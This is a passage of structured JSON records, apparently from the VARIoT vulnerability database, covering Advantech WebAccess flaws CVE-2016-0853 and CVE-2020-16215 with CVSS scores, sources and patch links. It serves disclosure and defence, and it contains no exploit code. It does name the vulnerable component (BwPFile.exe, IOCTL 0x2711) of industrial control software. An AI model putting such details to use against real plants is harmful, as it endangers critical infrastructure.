"CVE-2016-0853", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0853", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0853", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00433", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-326", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-88363", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "VULHUB", "id": "VHN-88363" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.1 allows remote attackers to obtain sensitive information via crafted input. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0853" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88363" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0853", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-326", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00433", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001283", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D87B2C-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88363", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "VULHUB", "id": "VHN-88363" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "id": "VAR-201601-0035", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "VULHUB", "id": "VHN-88363" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" } ] }, "last_update_date": "2024-11-23T21:43:23.586000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Information Disclosure Vulnerability (CNVD-2016-00433)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70376" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59644" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88363" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0853" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0853" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "VULHUB", "id": "VHN-88363" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "VULHUB", "id": "VHN-88363" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00433" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88363" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-326" }, { "date": "2016-01-15T03:59:15.500000", "db": "NVD", "id": "CVE-2016-0853" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00433" }, { "date": "2016-01-21T00:00:00", "db": "VULHUB", "id": "VHN-88363" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-326" }, { "date": "2024-11-21T02:42:30.660000", "db": "NVD", "id": "CVE-2016-0853" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-326" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerability in which important information is obtained", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001283" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-326" } ], "trust": 0.6 } }
var-202008-1237
Vulnerability from variot
Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause a stack-based buffer overflow, which may allow remote code execution, disclosure/modification of information, or cause the application to crash. WebAccess HMI Designer Is Advantech Company Provides Human Machine Interface (HMI) Development software. WebAccess HMI Designer The following multiple vulnerabilities exist in. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwPFile.exe when invoked via IOCTL 0x2711. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. The product has functions such as data transmission, menu editing and text editing.
There is a buffer overflow vulnerability in Advantech WebAccess HMI Designer 2.1.9.31 and earlier versions, which is caused by the program's failure to correctly verify the data submitted by the user
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202008-1237", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess\\/hmi designer", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.1.9.31" }, { "model": "webaccess/hmi", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "version 2.1.9.31" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess hmi designer", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.1.9.31" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess_hmi_designer", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-007354" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-20-953" } ], "trust": 0.7 }, "cve": "CVE-2020-16215", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2020-16215", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2020-49486", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-169271", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "Low", "attackVector": "Local", "author": "IPA score", "availabilityImpact": "High", "baseScore": 7.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-007354", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 3.2, "userInteraction": "Required", "vectorString": "3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2020-16215", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "IPA score", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-007354", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Local", "author": "IPA score", "availabilityImpact": "None", "baseScore": 3.3, "baseSeverity": "Low", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "JVNDB-2020-007354", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-16215", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "IPA", "id": "JVNDB-2020-007354", "trust": 3.2, "value": "High" }, { "author": "nvd@nist.gov", "id": "CVE-2020-16215", "trust": 1.0, "value": "HIGH" }, { "author": "IPA", "id": "JVNDB-2020-007354", "trust": 0.8, "value": "Critical" }, { "author": "IPA", "id": "JVNDB-2020-007354", "trust": 0.8, "value": "Low" }, { "author": "ZDI", "id": "CVE-2020-16215", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2020-49486", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202008-266", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-169271", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-16215", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" }, { "db": "VULMON", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "CNNVD", "id": "CNNVD-202008-266" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause a stack-based buffer overflow, which may allow remote code execution, disclosure/modification of information, or cause the application to crash. WebAccess HMI Designer Is Advantech Company Provides Human Machine Interface (HMI) Development software. WebAccess HMI Designer The following multiple vulnerabilities exist in. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwPFile.exe when invoked via IOCTL 0x2711. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. The product has functions such as data transmission, menu editing and text editing. \n\r\n\r\nThere is a buffer overflow vulnerability in Advantech WebAccess HMI Designer 2.1.9.31 and earlier versions, which is caused by the program\u0027s failure to correctly verify the data submitted by the user", "sources": [ { "db": "NVD", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" }, { "db": "VULMON", "id": "CVE-2020-16215" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-16215", "trust": 3.9 }, { "db": "ICS CERT", "id": "ICSA-20-219-02", "trust": 2.6 }, { "db": "ZDI", "id": "ZDI-20-953", "trust": 2.5 }, { "db": "JVN", "id": "JVNVU90924965", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-007354", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10144", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2020-49486", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-202008-266", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.2721", "trust": 0.6 }, { "db": "NSFOCUS", "id": "49122", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-169271", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-16215", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" }, { "db": "VULMON", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "CNNVD", "id": "CNNVD-202008-266" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "id": "VAR-202008-1237", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" } ], "trust": 1.1606310899999999 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49486" } ] }, "last_update_date": "2024-11-23T21:51:24.149000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Support \u0026 Download", "trust": 0.8, "url": "https://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-F6UG0T" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-219-02" }, { "title": "Patch for Advantech WebAccess HMI Designer buffer overflow vulnerability (CNVD-2020-49486)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/231118" }, { "title": "Advantech WebAccess HMI Designer Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=125964" }, { "title": "CVE-Flow", "trust": 0.1, "url": "https://github.com/404notf0und/CVE-Flow " } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULMON", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "CNNVD", "id": "CNNVD-202008-266" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-787", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-169271" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.3, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-219-02" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16215" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-953/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16229" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16215" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16217" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16207" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16211" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16213" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu90924965/" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16217" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16207" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16211" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16213" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16229" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2721/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/49122" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/404notf0und/cve-flow" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" }, { "db": "VULMON", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "CNNVD", "id": "CNNVD-202008-266" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-20-953" }, { "db": "CNVD", "id": "CNVD-2020-49486" }, { "db": "VULHUB", "id": "VHN-169271" }, { "db": "VULMON", "id": "CVE-2020-16215" }, { "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "db": "CNNVD", "id": "CNNVD-202008-266" }, { "db": "NVD", "id": "CVE-2020-16215" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-10T00:00:00", "db": "ZDI", "id": "ZDI-20-953" }, { "date": "2020-08-19T00:00:00", "db": "CNVD", "id": "CNVD-2020-49486" }, { "date": "2020-08-06T00:00:00", "db": "VULHUB", "id": "VHN-169271" }, { "date": "2020-08-06T00:00:00", "db": "VULMON", "id": "CVE-2020-16215" }, { "date": "2020-08-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "date": "2020-08-06T00:00:00", "db": "CNNVD", "id": "CNNVD-202008-266" }, { "date": "2020-08-06T19:15:13.817000", "db": "NVD", "id": "CVE-2020-16215" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-10T00:00:00", "db": "ZDI", "id": "ZDI-20-953" }, { "date": "2020-08-31T00:00:00", "db": "CNVD", "id": "CNVD-2020-49486" }, { "date": "2021-11-22T00:00:00", "db": "VULHUB", "id": "VHN-169271" }, { "date": "2021-11-22T00:00:00", "db": "VULMON", "id": "CVE-2020-16215" }, { "date": "2020-08-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-007354" }, { "date": "2021-11-23T00:00:00", "db": "CNNVD", "id": "CNNVD-202008-266" }, { "date": "2024-11-21T05:06:57.203000", "db": "NVD", "id": "CVE-2020-16215" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-202008-266" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": 